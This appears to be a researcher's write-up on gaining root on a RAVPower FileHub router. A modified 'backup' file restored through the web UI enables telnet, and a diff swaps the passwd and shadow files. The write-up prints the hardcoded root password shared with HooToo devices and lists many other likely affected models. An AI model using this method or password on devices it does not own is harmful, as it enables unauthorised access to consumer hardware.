if this looks familiar.. it's because it is - this particular model/firmware combination is running a very similar 'firmware' as the [HooToo](hootoo) devices.
however, as noted in the upgrade saga there, none of these devices are _exactly_ the same
### nmap
initially, we see:
```
PORT STATE SERVICE VERSION
80/tcp open http lighttpd
81/tcp open http Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
85/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
like the HooToo, running 2 webservers on `80` and `81` and 'something' on `85`. when we plug a drive in, the NAS/NFS functionality lights up a few more ports:
```
TODO add this
```
### 'backup'
while looking through the web UI and comparing it to the HooToo, i noticed a 'Backup Settings' option.
[http://device/sysfirm.csp?fname=sysbackupform&t=timestamp](http://10.10.10.254:81/sysfirm.csp?fname=sysbackupform&t=1467949779552) downloads a file:
assuming that this was probably the same underlying system as the HooToo, there should be some concept of `telnetd`. searching the file found code that appeared to be /etc/rc.d load scripts:
```shell
#Modify for 3G reset not Open
if [ ! -f /etc/checktelnetflag ]; then
telnetd &
elif [ -f /etc/telnetflag ]; then
telnetd &
fi
```
my first attempt was to modify the file to just include a blind run of `telnetd &`:
this started telnet (after restoring the file through the same web UI used to back up the original)!
```
TODO fill in initial admin login here
```
using the same password for `admin` that is used in the web UI, i was able to login.
i looked, and again, `/etc/passwd` and `/etc/shadow` were world readable. i took the contents to my trusty GCE v16 instance, and.. cracked the root password immediately.
yep, using the same root password has the HooToo devices here too: `20080826`
however, the `/etc/passwd` contents were not the same:
`root` has a login shell of `/sbin/nologin` - so even though we know the password, because this firmware doesn't have `sudo`, we can't get root access directly.
i changed tactics, and decided to just create the flagfile `/etc/telnetdflag`, assuming it was some dev trigger, especially after seeing:
```shell
if [ -f /etc/telnetflag ]; then
sed -i "s|:/root:/sbin/nologin|:/root:/bin/sh|" /etc/passwd
#cp -f /etc/telnetpasswd /etc/passwd
#cp -f /etc/telnetshadow /etc/shadow
fi
```
aha! so not only will that file start `telnetd`, but it will also let us login. so, modify the 'backup' to just create that file instead:
except.. after we restore this 'backup', we still can't login:
```
TODO add this
```
looking deeper, while the code had executed (`telnetd` was still running after all), it appears that the change for `/bin/sh` was applied to `/etc/telnetpasswd`, not `/etc/passwd`.
i uncommented the lines that copied one to the other, giving:
```
$ diff fw_120101.bin.gz fw_rooted.bin.gz --text
1683a1684
> touch /etc/telnetflag
2211,2212c2212,2213
<#cp-f/etc/telnetpasswd/etc/passwd
<#cp-f/etc/telnetshadow/etc/shadow
---
> cp -f /etc/telnetpasswd /etc/passwd
> cp -f /etc/telnetshadow /etc/shadow
3986,3987c3987,3988
< # cp -f /etc/telnetpasswd /etc/passwd
< # cp -f /etc/telnetshadow /etc/shadow
---
> cp -f /etc/telnetpasswd /etc/passwd
> cp -f /etc/telnetshadow /etc/shadow
```
and after applying, got to:
```
WD02 login: root
Password:
login: can't chdir to home directory '/root'
#
```
## other affected devices
while looking for `*.js` files used, i found the obviously interesting `config.js`. i was expecting configuration of the device, but what i found was the more obvious, configuration for the device:
```javascript
//泽宝RAV
var WD01 = {title:"RAVPower FileHub",services: ["win:Service_Win","skip:Service_SKIP"], language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"WD01",icons:"WD01_",hasRJ45:false};
var WD02 = {title:"RAV FileHub", language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",hasPPPoE:true,theme:"WD02",icons:"WD02_",hasRJ45:true,services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"]};
//HooToo
var TM01 = {language:["us","zh_CN","tr_CN"],title:"TripMate",theme:"TM01",hasWiFiMHZ:true,hasHideSSID:true,hasRJ45:true,hasPPPoE:true,helphtml: "help/{#lge}.html",icons:"TM01_",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]};
var TM02 = {title:"TripMate Nano", services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM02",icons:"TM02_",hasPPPoE:true};
var TM03 = {title:"TripMate Mini",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM03",icons:"TM04_",hasPPPoE:true};
var TM04 = {title:"TripMate Elite",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM04",icons:"TM04_",hasPPPoE:true};
```
given this, i think it's fair to assume that all of these devices listed [below](#complete-device-list) are equally vulnerable.
## 'backup' strikes again
kicking myself for missing the 'backup' vector when looking at the HooToo devices, i took another look - and no, there was no 'Backup / Restore Settings' option in the web UI.
remembering that a lot of the HooToo functionality lived behind `*.csp``GET`s, it seemed reasonable that the backup method for the RAV-FileHub would also work for the HooToo devices. it [does](TODO add this writeup to the hootoo side so we can link to it from here).
var WMC_i22 = {language:["us","zh_CN","tr_CN","ja_JP","de_DE","ko_KO","ru_RU","fr_FR","pu_PU","sp_SP","du_DU","it_IT"],theme:"WMC_i22",title:"FP-WiFi Disk",hasRJ45:false};
var WMC_i21 = {language:["us","zh_CN","tr_CN","ja_JP","de_DE","ko_KO","ru_RU","fr_FR","pu_PU","sp_SP","du_DU","it_IT"],theme:"WMC_i21",title:"FP-WiFi Disk",hasRJ45:true};
//Lenovo
var LeDisk= {language:["us","zh_CN","tr_CN"],theme:"LeDisk",title:"Lenovo WiFi Disk",hasRJ45:true,hasPPPoE: true,hotPlug: false,services: ["win:Service_Win","dlna:Service_DLNA"],helphtml: "help/{#lge}.html"};
//I-O DATA
var WFSSR01 = {language:["ja_JP"], theme:"WFSSR01", title:"WFS-SR01",helphtml: "help/{#lge}.html"};
var WFSCSR01 = {language:["tr_CN","zh_CN","us","ja_JP"],title:"WFS-CSR01",theme:"WFSCSR01",helphtml: "help/{#lge}.html"};
//Maxwave
var EZCH31 = {language:["us"], theme:"EZCH31", title:"WiFi Disk"};
//PEARL
var PX4854 = {language:["de_DE","fr_FR","us"], theme:"PX4854", title:"7links WLAN-Speicheradapter",hasRJ45:false,helphtml: "help/{#lge}.html",firmwareUrl: "http://www.pearl.de"};
var PX4893 = {language:["de_DE","fr_FR","us"], theme:"PX4893", title:"7links WLAN-Speicheradapter",hasRJ45:false,helphtml: "help/{#lge}.html",firmwareUrl: "http://www.pearl.de"};
var WHL220M = {language:["us","ru_RU"] ,hotPlug:false,theme:"WHL220M",title:"3Q WiFi Disk Manager",helphtml: "help/{#lge}.html",firmwareUrl: "www.3Q-int.com"}
//MEDION
var WLAN_HDD_N_GO = { language: ["us","fr_FR","de_DE","du_DU","pu_PU","sp_SP","it_IT","dk_DK"], theme: "WLAN_HDD_N_GO", title: "WLAN HDD N GO",hasRJ45: false,icons:"WLAN_HDD_N_GO_",network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]}
var iAirDisk = {title:"Air Disk", language:["tr_CN","zh_CN","us"],hasPPPoE: true, theme:"iAirDisk"};
//Sarotech
var WFABU2 = {title:"Sarotech WiDisk", language:["us","zh_CN","tr_CN","ko_KO"], theme:"WFABU2"};
//Valence
var MicroSD = {title:"Valence iCloud", language:["tr_CN","zh_CN","us"],hasPPPoE: true, theme:"MicroSD"};
//泽宝RAV
var WD01 = {title:"RAVPower FileHub",services: ["win:Service_Win","skip:Service_SKIP"], language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"WD01",icons:"WD01_",hasRJ45:false};
var WD02 = {title:"RAV FileHub", language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",hasPPPoE:true,theme:"WD02",icons:"WD02_",hasRJ45:true,services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"]};
//HooToo
var TM01 = {language:["us","zh_CN","tr_CN"],title:"TripMate",theme:"TM01",hasWiFiMHZ:true,hasHideSSID:true,hasRJ45:true,hasPPPoE:true,helphtml: "help/{#lge}.html",icons:"TM01_",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]};
var TM02 = {title:"TripMate Nano", services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM02",icons:"TM02_",hasPPPoE:true};
var TM03 = {title:"TripMate Mini",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM03",icons:"TM04_",hasPPPoE:true};
var TM04 = {title:"TripMate Elite",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM04",icons:"TM04_",hasPPPoE:true};
//Choton 中创
var WiCloud = {title:"WiCloud",language:["zh_CN","tr_CN","us","fr_FR","de_DE","ko_KO","pu_PU","du_DU","sp_SP","it_IT"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"],services: ["win:Service_Win","dlna:Service_DLNA"],theme:"WiCloud",hasPPPoE:true};
//DAHENG 大恒
var DH_3000WIFI = {theme:"DH_3000WIFI",title:"DAHENG WIFI",language:["zh_CN","tr_CN","us","fr_FR","de_DE","ko_KO","sp_SP","it_IT"],services: ["win:Service_Win","dlna:Service_DLNA"],hasPPPoE:true,has3G:true};
//PNY
var PNYMediaReader = {theme:"PNYMediaReader",title:"PNY Wireless Media Reader",language:["us","zh_CN","tr_CN","fr_FR","de_DE","ru_RU","pu_PU","sp_SP","du_DU","it_IT"],services: ["win:Service_Win","dlna:Service_DLNA"],hasRJ45: false};
//Merlin Digital 的 WifiHDD
var WifiStorage = {theme:"WifiStorage",title:"WiFi Disk",language:["us"],hotPlug:false,hasPPPoE:true};